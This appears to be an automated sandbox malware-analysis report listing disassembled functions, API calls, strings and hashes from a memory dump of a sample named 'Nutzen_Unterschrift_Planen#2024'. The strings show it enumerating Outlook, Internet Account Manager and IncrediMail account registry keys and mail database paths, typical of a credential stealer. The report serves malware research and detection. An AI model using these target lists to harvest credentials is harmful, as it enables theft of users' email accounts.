                                                            • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                            Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy
                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                            • API String ID: 714388716-318151290
                                                            • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                            • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                            • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                            • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                            Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                            • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                            • SelectObject.GDI32(?,?), ref: 0040CACC
                                                            • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                            • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                              • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                              • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                              • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                            • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                            • SetCursor.USER32(00000000), ref: 0040CB35
                                                            • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                            • SetFocus.USER32(?), ref: 0040CB92
                                                            • SetFocus.USER32(?), ref: 0040CC0B
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                            • String ID:
                                                            • API String ID: 1416211542-0
                                                            • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                            • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                            • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                            • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                            Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                            • API String ID: 2360744853-2229823034
                                                            • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                            • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                            Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            • memset.MSVCRT ref: 00402C9D
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • memset.MSVCRT ref: 00402CF7
                                                            • sprintf.MSVCRT ref: 00402D10
                                                            • sprintf.MSVCRT ref: 00402D4E
                                                              • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                              • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Closememset$sprintf$EnumOpen
                                                            • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                            • API String ID: 1831126014-3814494228
                                                            • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                            • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                            • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                            • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                            Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strchr.MSVCRT ref: 004100E4
                                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                            • _mbscat.MSVCRT ref: 0041014D
                                                            • memset.MSVCRT ref: 00410129
                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                            • memset.MSVCRT ref: 00410171
                                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                            • _mbscat.MSVCRT ref: 00410197
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                            • String ID: \systemroot
                                                            • API String ID: 912701516-1821301763
                                                            • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                            • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                            Function 00402FDB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            • memset.MSVCRT ref: 0040301E
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • memset.MSVCRT ref: 0040306B
                                                            • sprintf.MSVCRT ref: 00403083
                                                            • memset.MSVCRT ref: 004030B4
                                                            • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                            • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$Close$EnumOpensprintf
                                                            • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                            • API String ID: 3672803090-3168940695
                                                            • Opcode ID: c2fb41edc4bda7a0edf8d5371692b0db7420076daff6a6cdf3d8eefb2c67b369
                                                            • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                            • Opcode Fuzzy Hash: c2fb41edc4bda7a0edf8d5371692b0db7420076daff6a6cdf3d8eefb2c67b369
                                                            • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                            Function 00408F1B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                            • String ID: 0$6
                                                            • API String ID: 3540791495-3849865405
                                                            • Opcode ID: 3531e9c810b83e1c9a81e25a42051b0a33e7210e19b9d911fdb8999888636a2e
                                                            • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                            • Opcode Fuzzy Hash: 3531e9c810b83e1c9a81e25a42051b0a33e7210e19b9d911fdb8999888636a2e
                                                            • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                            Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                            • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                            • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                            • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                            • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                            Strings
                                                            • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                            • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                            • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                            • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FromStringUuid$FreeTaskmemcpy
                                                            • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                            • API String ID: 1640410171-2022683286
                                                            • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                            • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                            • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                            • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                            Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                            • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                            • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$strlen
                                                            • String ID: -journal$-wal$immutable$nolock
                                                            • API String ID: 2619041689-3408036318
                                                            • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                            • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                            • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                            • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                            Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$strlen
                                                            • String ID:
                                                            • API String ID: 667451143-3916222277
                                                            • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                            • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                            • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                            • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                            Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(comctl32.dll,75D50A60,?,00000000,?,?,?,0040CF60,75D50A60), ref: 00404AB8
                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75D50A60), ref: 00404ADE
                                                            • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                            • API String ID: 2780580303-317687271
                                                            • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                            • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                            • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                            • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                            Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                            • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                            • strlen.MSVCRT ref: 00406CCC
                                                            • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                                            • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                            • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                            • String ID: Unknown Error$netmsg.dll
                                                            • API String ID: 2881943006-572158859
                                                            • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                            • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                            • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                            • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                            Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                            • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                            • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                            • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                              • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                            • API String ID: 888011440-2039793938
                                                            • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                            • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                            • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                            • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                            Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • cannot ATTACH database within transaction, xrefs: 0042E966
                                                            • database is already attached, xrefs: 0042EA97
                                                            • unable to open database: %s, xrefs: 0042EBD6
                                                            • out of memory, xrefs: 0042EBEF
                                                            • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                            • database %s is already in use, xrefs: 0042E9CE
                                                            • too many attached databases - max %d, xrefs: 0042E951
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                            • API String ID: 1297977491-2001300268
                                                            • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                            • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                            • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                            • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                            Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A3E
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A4C
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A5D
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A74
                                                              • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75D50A60,?,00000000), ref: 00409A7D
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,75D50A60,?,00000000), ref: 00409C53
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,75D50A60,?,00000000), ref: 00409C6F
                                                            • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,75D50A60), ref: 00409C97
                                                            • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,75D50A60), ref: 00409CB4
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75D50A60), ref: 00409D3D
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,75D50A60), ref: 00409D47
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,75D50A60), ref: 00409D7F
                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75D50A60), ref: 00408EBE
                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408E31
                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                            • String ID: 0wE$d
                                                            • API String ID: 2915808112-1552800882
